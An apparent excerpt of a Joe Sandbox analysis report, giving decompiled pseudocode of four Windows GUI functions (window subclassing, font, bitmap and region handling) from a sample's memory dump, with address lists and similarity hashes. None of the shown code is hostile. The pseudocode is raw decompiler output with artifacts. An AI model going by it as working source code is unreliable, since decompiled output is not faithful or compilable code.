                                                                                                                            0x0040defb
                                                                                                                            0x0040defc
                                                                                                                            0x00000000
                                                                                                                            0x0040defc
                                                                                                                            0x00000000
                                                                                                                            0x0040def9
                                                                                                                            0x0040df07
                                                                                                                            0x0040df0b
                                                                                                                            0x0040df10
                                                                                                                            0x0040df12
                                                                                                                            0x0040df1c
                                                                                                                            0x0040df33
                                                                                                                            0x0040df33
                                                                                                                            0x0040df35
                                                                                                                            0x0040df37
                                                                                                                            0x0040df38
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040df27
                                                                                                                            0x0040df29
                                                                                                                            0x0040df2b
                                                                                                                            0x0040df2e
                                                                                                                            0x00000000
                                                                                                                            0x0040df2e
                                                                                                                            0x00000000
                                                                                                                            0x0040df2b
                                                                                                                            0x0040df4b
                                                                                                                            0x00000000
                                                                                                                            0x0040df14
                                                                                                                            0x00000000
                                                                                                                            0x0040df14
                                                                                                                            0x0040df12
                                                                                                                            0x0040258a
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040256b
                                                                                                                            0x00402570
                                                                                                                            0x00402574
                                                                                                                            0x00402576
                                                                                                                            0x00000000
                                                                                                                            0x00402577
                                                                                                                            0x0040257d
                                                                                                                            0x0040257d
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3219385341-0
                                                                                                                            • Opcode ID: 057b53b6144d54f3c5fa881e4c09bd18caa497a631cbac75c9c3b2868f101258
                                                                                                                            • Instruction ID: 6350c3ad66bd9685793953da31fee4dd20441eb2d972cca0dc9eb4559599b769
                                                                                                                            • Opcode Fuzzy Hash: 057b53b6144d54f3c5fa881e4c09bd18caa497a631cbac75c9c3b2868f101258
                                                                                                                            • Instruction Fuzzy Hash: 3E314631B04216ABDA216B64DC84E7F76ACEF85784B11417BF402F72D2CB39DC0656AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A2AA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A2AA(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E0040580C();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E004070A0(1, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E0041EC90(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E0040A0D8(_t61, _t72, GetWindowLongA, _t72, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E0040A1F6(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}



















                                                                                                                            0x0040a2b3
                                                                                                                            0x0040a2ba
                                                                                                                            0x0040a2c0
                                                                                                                            0x0040a2c5
                                                                                                                            0x0040a2ea
                                                                                                                            0x0040a2ea
                                                                                                                            0x0040a2f0
                                                                                                                            0x0040a2f2
                                                                                                                            0x0040a2f2
                                                                                                                            0x0040a2f0
                                                                                                                            0x0040a2f5
                                                                                                                            0x0040a2fa
                                                                                                                            0x0040a2fe
                                                                                                                            0x0040a301
                                                                                                                            0x0040a301
                                                                                                                            0x0040a304
                                                                                                                            0x0040a30c
                                                                                                                            0x0040a311
                                                                                                                            0x0040a311
                                                                                                                            0x0040a314
                                                                                                                            0x0040a318
                                                                                                                            0x0040a31b
                                                                                                                            0x0040a322
                                                                                                                            0x0040a327
                                                                                                                            0x0040a329
                                                                                                                            0x0040a32d
                                                                                                                            0x0040a337
                                                                                                                            0x0040a33c
                                                                                                                            0x0040a342
                                                                                                                            0x0040a345
                                                                                                                            0x0040a356
                                                                                                                            0x0040a35d
                                                                                                                            0x0040a360
                                                                                                                            0x0040a360
                                                                                                                            0x0040a32d
                                                                                                                            0x0040a327
                                                                                                                            0x0040a376
                                                                                                                            0x0040a378
                                                                                                                            0x0040a387
                                                                                                                            0x0040a393
                                                                                                                            0x0040a397
                                                                                                                            0x0040a39f
                                                                                                                            0x0040a39f
                                                                                                                            0x0040a397
                                                                                                                            0x0040a3a7
                                                                                                                            0x0040a3ba

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LongWindow$MessageSend_memset
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 2997958587-3887548279
                                                                                                                            • Opcode ID: f56f390953a87cda01ce263a360b642bd7ddee0607c22dd1d87b0c9c4a835861
                                                                                                                            • Instruction ID: cf10dcfba54683d7ef6b0464eaac6cfc2ebbdd395fc399aead5ea7b45dc7805d
                                                                                                                            • Opcode Fuzzy Hash: f56f390953a87cda01ce263a360b642bd7ddee0607c22dd1d87b0c9c4a835861
                                                                                                                            • Instruction Fuzzy Hash: 6531C171600710AFCB20AF79C884A6EB7E4BF48315F04467EE542A77D1DB39E810CB5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410637 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E00410637(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t79;
				signed int _t85;
				intOrPtr* _t89;
				void* _t90;

				_t73 = __ebx;
				_push(0x80);
				E0041E9EA(E004318AE, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t90 + 8));
				_t89 = __ecx;
				 *((intOrPtr*)(_t90 - 0x50)) = 0;
				 *((intOrPtr*)(_t90 - 0x54)) = 0x434f00;
				 *(_t90 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E0040FA97(_t90 - 0x54, 0x11) != 0 || E0040FA97(_t90 - 0x54, 0xd) != 0) {
						_t49 = _t90 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t89 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x407bee
					GetObjectA( *_t11, 0x3c, _t90 - 0x4c);
					_push(_t90 - 0x30);
					 *(_t90 - 0x78) = 0x20;
					E0040DE71(_t73, _t90 - 0x58, 0, _t89, __eflags);
					 *((intOrPtr*)(_t90 - 0x74)) =  *((intOrPtr*)(_t90 - 0x58));
					 *((short*)(_t90 - 0x68)) =  *((intOrPtr*)(_t90 - 0x3c));
					 *(_t90 - 0x66) =  *(_t90 - 0x35) & 0x000000ff;
					 *(_t90 - 0x64) =  *(_t90 - 0x38) & 0x000000ff;
					 *(_t90 - 0x60) =  *(_t90 - 0x37) & 0x000000ff;
					 *(_t90 - 0x5c) =  *(_t90 - 0x36) & 0x000000ff;
					_t60 =  *(_t90 - 0x4c);
					__eflags = _t60;
					 *(_t90 - 4) = 1;
					_t73 = _t60;
					if(__eflags < 0) {
						_t73 =  ~_t60;
					}
					E004078EE(_t73, _t90 - 0x8c, 0, _t89, __eflags);
					 *(_t90 - 4) = 2;
					_t79 = GetDeviceCaps( *(_t90 - 0x84), 0x5a);
					_t64 = _t73 * 0xafc80;
					asm("cdq");
					_t85 = _t64 % _t79;
					_t89 = _t89 + 0x64;
					 *((intOrPtr*)(_t90 - 0x6c)) = 0;
					 *(_t90 - 0x70) = _t64 / _t79;
					E0041982B(_t89);
					_t67 = _t90 - 0x78;
					__imp__#420(_t67, 0x437c1c, _t89,  *((intOrPtr*)(_t89 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t89 = 0;
					}
					 *(_t90 - 4) = 1;
					E00407942(_t73, _t90 - 0x8c, 0, _t89, __eflags);
					__eflags =  *((intOrPtr*)(_t90 - 0x58)) + 0xfffffff0;
					_t69 = E00402C55( *((intOrPtr*)(_t90 - 0x58)) + 0xfffffff0, _t85);
				}
				 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t90 - 0x54)) = 0x434040;
				E00407AE6(_t69, _t90 - 0x54);
				return E0041EA6D(_t73, 0, _t89);
			}











                                                                                                                            0x00410637
                                                                                                                            0x00410637
                                                                                                                            0x00410641
                                                                                                                            0x00410646
                                                                                                                            0x0041064b
                                                                                                                            0x0041064d
                                                                                                                            0x00410650
                                                                                                                            0x00410659
                                                                                                                            0x0041065c
                                                                                                                            0x0041066f
                                                                                                                            0x00410687
                                                                                                                            0x00000000
                                                                                                                            0x0041067f
                                                                                                                            0x0041067f
                                                                                                                            0x0041067f
                                                                                                                            0x0041068a
                                                                                                                            0x0041068a
                                                                                                                            0x00410690
                                                                                                                            0x00410693
                                                                                                                            0x0041069c
                                                                                                                            0x004106a0
                                                                                                                            0x004106a7
                                                                                                                            0x004106af
                                                                                                                            0x004106b6
                                                                                                                            0x004106bf
                                                                                                                            0x004106c7
                                                                                                                            0x004106ce
                                                                                                                            0x004106d5
                                                                                                                            0x004106d8
                                                                                                                            0x004106db
                                                                                                                            0x004106dd
                                                                                                                            0x004106e1
                                                                                                                            0x004106e3
                                                                                                                            0x004106e7
                                                                                                                            0x004106e7
                                                                                                                            0x004106f2
                                                                                                                            0x004106ff
                                                                                                                            0x00410709
                                                                                                                            0x0041070d
                                                                                                                            0x00410713
                                                                                                                            0x00410714
                                                                                                                            0x00410716
                                                                                                                            0x0041071a
                                                                                                                            0x0041071d
                                                                                                                            0x00410720
                                                                                                                            0x0041072b
                                                                                                                            0x0041072f
                                                                                                                            0x00410735
                                                                                                                            0x00410737
                                                                                                                            0x00410739
                                                                                                                            0x00410739
                                                                                                                            0x00410741
                                                                                                                            0x00410745
                                                                                                                            0x0041074d
                                                                                                                            0x00410750
                                                                                                                            0x00410750
                                                                                                                            0x00410755
                                                                                                                            0x0041075c
                                                                                                                            0x00410763
                                                                                                                            0x0041076d

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00410641
                                                                                                                            • GetObjectA.GDI32(00407BEE,0000003C,?), ref: 00410693
                                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 00410703
                                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,00437C1C), ref: 0041072F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                            • String ID: $@@C
                                                                                                                            • API String ID: 2429671754-1199911583
                                                                                                                            • Opcode ID: e658f8a0e42adab50f2479832a1d117f9a6a5b64bd78307aa3b62ee44c6dbf63
                                                                                                                            • Instruction ID: 88a8f6b58ff227a9390a25782f5eee4374f11087e4c479cf414f30b9ccddf245
                                                                                                                            • Opcode Fuzzy Hash: e658f8a0e42adab50f2479832a1d117f9a6a5b64bd78307aa3b62ee44c6dbf63
                                                                                                                            • Instruction Fuzzy Hash: F4418A74E012489ADB20DFE5C905AECBBF4AF58304F10812BE445EB291E7B89A84CF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004056AB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 69%
                                                                                                                            			E004056AB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a116, void* _a120) {
				void _v12;
				char _v16;
				intOrPtr _v20;
				int _v24;
				char _v124;
				char _v172;
				signed int _t25;
				unsigned int _t27;
				unsigned int _t31;
				int _t36;
				signed int* _t43;
				struct HBITMAP__* _t45;
				int _t48;
				void* _t49;
				unsigned int _t50;
				signed int _t53;
				void* _t56;
				signed char* _t57;
				signed int _t62;
				void* _t63;
				signed int _t66;
				signed short _t68;
				void* _t70;
				signed int _t72;

				_t56 = __edx;
				_t72 =  &_v124;
				_t25 =  *0x441590; // 0x4917eadc
				_a116 = _t25 ^ _t72;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t27 = GetMenuCheckMarkDimensions();
				_t48 = _t27;
				_t50 = _t27 >> 0x10;
				_v24 = _t50;
				if(_t48 <= 4 || _t50 <= 5) {
					_push(_t72);
					_push(_t50);
					_v172 = 0x4408f8;
					E00420866( &_v172, 0x43b8fc);
					asm("int3");
					_t31 = _t50;
					 *(_t31 + 4) = 1;
					return _t31;
				} else {
					if(_t48 > 0x20) {
						_t48 = 0x20;
					}
					asm("cdq");
					_t66 = _t48 + 0xf >> 4;
					_t62 = (_t48 - 4 - _t56 >> 1) + (_t66 << 4) - _t48;
					if(_t62 > 0xc) {
						_t62 = 0xc;
					}
					_t36 = 0x20;
					if(_t50 > _t36) {
						_v24 = _t36;
					}
					E0041EC90(_t62,  &_v12, 0xff, 0x80);
					_t43 = _t72 + (_v24 + 0xfffffffa >> 1) * _t66 * 2 - 0xc;
					_t57 = 0x433d24;
					_v20 = _t66 + _t66;
					_v16 = 5;
					do {
						_t68 = ( *_t57 & 0x000000ff) << _t62;
						_t57 =  &(_t57[1]);
						_t53 =  !_t68 & 0x0000ffff;
						 *_t43 = _t53;
						_t43[0] = _t53;
						_t43 = _t43 + _v20;
						_t17 =  &_v16;
						 *_t17 = _v16 - 1;
					} while ( *_t17 != 0);
					_t45 = CreateBitmap(_t48, _v24, 1, 1,  &_v12);
					_pop(_t63);
					_pop(_t70);
					 *0x4444b8 = _t45;
					_pop(_t49);
					if(_t45 == 0) {
						 *0x4444b8 = _t45;
					}
					return E0041D773(_t45, _t49, _a116 ^ _t72, _t57, _t63, _t70);
				}
			}



























                                                                                                                            0x004056ab
                                                                                                                            0x004056ac
                                                                                                                            0x004056b6
                                                                                                                            0x004056bd
                                                                                                                            0x004056c0
                                                                                                                            0x004056c1
                                                                                                                            0x004056c2
                                                                                                                            0x004056c3
                                                                                                                            0x004056c9
                                                                                                                            0x004056d2
                                                                                                                            0x004056d5
                                                                                                                            0x004056d8
                                                                                                                            0x0040d8b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x004056e4
                                                                                                                            0x004056e7
                                                                                                                            0x004056eb
                                                                                                                            0x004056eb
                                                                                                                            0x004056ef
                                                                                                                            0x004056f5
                                                                                                                            0x00405703
                                                                                                                            0x00405708
                                                                                                                            0x0040570c
                                                                                                                            0x0040570c
                                                                                                                            0x0040570f
                                                                                                                            0x00405712
                                                                                                                            0x00405714
                                                                                                                            0x00405714
                                                                                                                            0x00405725
                                                                                                                            0x0040573b
                                                                                                                            0x0040573f
                                                                                                                            0x00405744
                                                                                                                            0x00405747
                                                                                                                            0x0040574e
                                                                                                                            0x00405754
                                                                                                                            0x00405757
                                                                                                                            0x0040575b
                                                                                                                            0x0040575e
                                                                                                                            0x00405760
                                                                                                                            0x00405763
                                                                                                                            0x00405766
                                                                                                                            0x00405766
                                                                                                                            0x00405766
                                                                                                                            0x00405777
                                                                                                                            0x0040577f
                                                                                                                            0x00405780
                                                                                                                            0x00405781
                                                                                                                            0x00405786
                                                                                                                            0x00405787
                                                                                                                            0x00405795
                                                                                                                            0x00405795
                                                                                                                            0x004057a8
                                                                                                                            0x004057a8

                                                                                                                            APIs
                                                                                                                            • GetMenuCheckMarkDimensions.USER32 ref: 004056C3
                                                                                                                            • _memset.LIBCMT ref: 00405725
                                                                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00405777
                                                                                                                            • LoadBitmapA.USER32 ref: 0040578F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                            • String ID: $$=C
                                                                                                                            • API String ID: 4271682439-2462734040
                                                                                                                            • Opcode ID: a44499c005b4655747f67bf2f995aea75a5736d3f407d43c4d792f488941dc28
                                                                                                                            • Instruction ID: 53566093734b55d51690aecfeb88d01f59f32302936d8a96e2525e2892e2adc1
                                                                                                                            • Opcode Fuzzy Hash: a44499c005b4655747f67bf2f995aea75a5736d3f407d43c4d792f488941dc28
                                                                                                                            • Instruction Fuzzy Hash: D631F572A006499FEB20CF78DC86ABF7BB5EB44304F15083BE902EB2C1D6389944CB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00413038 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E00413038(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t52;
				struct HRGN__* _t58;
				void* _t61;
				intOrPtr _t64;
				signed int _t65;
				intOrPtr _t66;
				void* _t72;
				intOrPtr* _t74;
				signed int _t77;
				void* _t79;
				void* _t80;
				intOrPtr* _t81;

				_t80 = __eflags;
				_t72 = __edx;
				_push(0x20);
				E0041E981(E00431A75, __ebx, __edi, __esi);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x10)) = 0;
				 *((intOrPtr*)(_t79 - 0x14)) = 0x435168;
				_t64 =  *((intOrPtr*)(_t79 + 8));
				_t67 = _t79 - 0x1c;
				 *(_t79 - 4) = 0;
				E004070B9(_t79 - 0x1c, _t80,  *((intOrPtr*)(_t64 - 0xb0)));
				_t7 = _t79 + 0x14; // 0x435168
				_t74 =  *_t7;
				_t81 = _t74;
				_t47 = 0 | _t81 == 0x00000000;
				 *(_t79 - 4) = 1;
				if(_t81 == 0) {
					_t47 = E0040D8B0(_t67);
				}
				 *_t74 = _t77;
				if( *(_t64 - 8) == _t77) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t64 - 0xac)) + 0x20)) + 0x20)));
					_t47 = E004077D4(_t64, _t72, _t74, _t77, __eflags);
					__eflags = _t47 - _t77;
					 *(_t64 - 8) = _t47;
					if(_t47 == _t77) {
						goto L3;
					} else {
						__eflags =  *(_t79 + 0xc) - _t77;
						if( *(_t79 + 0xc) != _t77) {
							IntersectRect(_t79 - 0x2c, _t64 - 0x9c,  *(_t79 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t26 = _t79 + 0x14; // 0x435168
							_t74 =  *_t26;
							_t77 = 0;
						}
						_t58 = CreateRectRgnIndirect(_t79 - 0x2c);
						_t31 = _t79 - 0x14; // 0x435168
						E00407A93(_t31, _t74, _t79, _t58);
						_t33 = _t79 - 0x14; // 0x435168
						_t61 = E004075A0( *(_t64 - 8), _t33, 1);
						_t65 =  *(_t64 - 8);
						__eflags = _t65 - _t77;
						if(_t65 != _t77) {
							_t66 =  *((intOrPtr*)(_t65 + 4));
						} else {
							_t66 = 0;
						}
						__eflags =  *((intOrPtr*)(_t79 - 0x18)) - _t77;
						 *_t74 = _t66;
						 *(_t79 - 4) = 0;
						if( *((intOrPtr*)(_t79 - 0x18)) != _t77) {
							_push( *((intOrPtr*)(_t79 - 0x1c)));
							_push(_t77);
							_t61 = E00406890();
						}
						 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
						_t41 = _t79 - 0x14; // 0x435168
						 *((intOrPtr*)(_t79 - 0x14)) = 0x434040;
						E00407AE6(_t61, _t41);
						_t52 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t79 - 4) = 0;
					if( *((intOrPtr*)(_t79 - 0x18)) != _t77) {
						_push( *((intOrPtr*)(_t79 - 0x1c)));
						_push(_t77);
						_t47 = E00406890();
					}
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					_t17 = _t79 - 0x14; // 0x435168
					 *((intOrPtr*)(_t79 - 0x14)) = 0x434040;
					E00407AE6(_t47, _t17);
					_t52 = 0x80004005;
				}
				return E0041EA59(_t52);
			}















                                                                                                                            0x00413038
                                                                                                                            0x00413038
                                                                                                                            0x00413038
                                                                                                                            0x0041303f
                                                                                                                            0x00413044
                                                                                                                            0x00413046
                                                                                                                            0x00413049
                                                                                                                            0x00413050
                                                                                                                            0x00413059
                                                                                                                            0x0041305c
                                                                                                                            0x0041305f
                                                                                                                            0x00413064
                                                                                                                            0x00413064
                                                                                                                            0x00413069
                                                                                                                            0x0041306b
                                                                                                                            0x0041306e
                                                                                                                            0x00413074
                                                                                                                            0x00413076
                                                                                                                            0x00413076
                                                                                                                            0x0041307b
                                                                                                                            0x00413080
                                                                                                                            0x004130c3
                                                                                                                            0x004130c4
                                                                                                                            0x004130c9
                                                                                                                            0x004130cb
                                                                                                                            0x004130ce
                                                                                                                            0x00000000
                                                                                                                            0x004130d0
                                                                                                                            0x004130d0
                                                                                                                            0x004130d3
                                                                                                                            0x004130f7
                                                                                                                            0x004130d5
                                                                                                                            0x004130de
                                                                                                                            0x004130df
                                                                                                                            0x004130e0
                                                                                                                            0x004130e1
                                                                                                                            0x004130e2
                                                                                                                            0x004130e2
                                                                                                                            0x004130e5
                                                                                                                            0x004130e5
                                                                                                                            0x00413101
                                                                                                                            0x00413108
                                                                                                                            0x0041310b
                                                                                                                            0x00413115
                                                                                                                            0x00413119
                                                                                                                            0x0041311e
                                                                                                                            0x00413121
                                                                                                                            0x00413123
                                                                                                                            0x00413129
                                                                                                                            0x00413125
                                                                                                                            0x00413125
                                                                                                                            0x00413125
                                                                                                                            0x0041312c
                                                                                                                            0x0041312f
                                                                                                                            0x00413131
                                                                                                                            0x00413135
                                                                                                                            0x00413137
                                                                                                                            0x0041313a
                                                                                                                            0x0041313b
                                                                                                                            0x0041313b
                                                                                                                            0x00413140
                                                                                                                            0x00413144
                                                                                                                            0x00413147
                                                                                                                            0x0041314e
                                                                                                                            0x00413153
                                                                                                                            0x00413153
                                                                                                                            0x00413153
                                                                                                                            0x00413082
                                                                                                                            0x00413082
                                                                                                                            0x00413085
                                                                                                                            0x00413089
                                                                                                                            0x0041308b
                                                                                                                            0x0041308e
                                                                                                                            0x0041308f
                                                                                                                            0x0041308f
                                                                                                                            0x00413094
                                                                                                                            0x00413098
                                                                                                                            0x0041309b
                                                                                                                            0x004130a2
                                                                                                                            0x004130a7
                                                                                                                            0x004130a7
                                                                                                                            0x0041315a

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041303F
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            • GetDC.USER32(?), ref: 004130BD
                                                                                                                            • IntersectRect.USER32 ref: 004130F7
                                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 00413101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                            • String ID: hQC$hQC
                                                                                                                            • API String ID: 3511876931-3629513465
                                                                                                                            • Opcode ID: 0b7f9bc9c2a463ddd58068ac5354ca4e09bdacb39f67ce6b396836a5dc7469db
                                                                                                                            • Instruction ID: 421a102ec2bc7450e06c205aaaeccb148bc5658bfcf617469501f2f7aec2c7d6
                                                                                                                            • Opcode Fuzzy Hash: 0b7f9bc9c2a463ddd58068ac5354ca4e09bdacb39f67ce6b396836a5dc7469db
                                                                                                                            • Instruction Fuzzy Hash: 42316F71D0021ADBCF01DFE4C585ADEBBB5AF08305F10806AE511BB291C778AB41CBAA
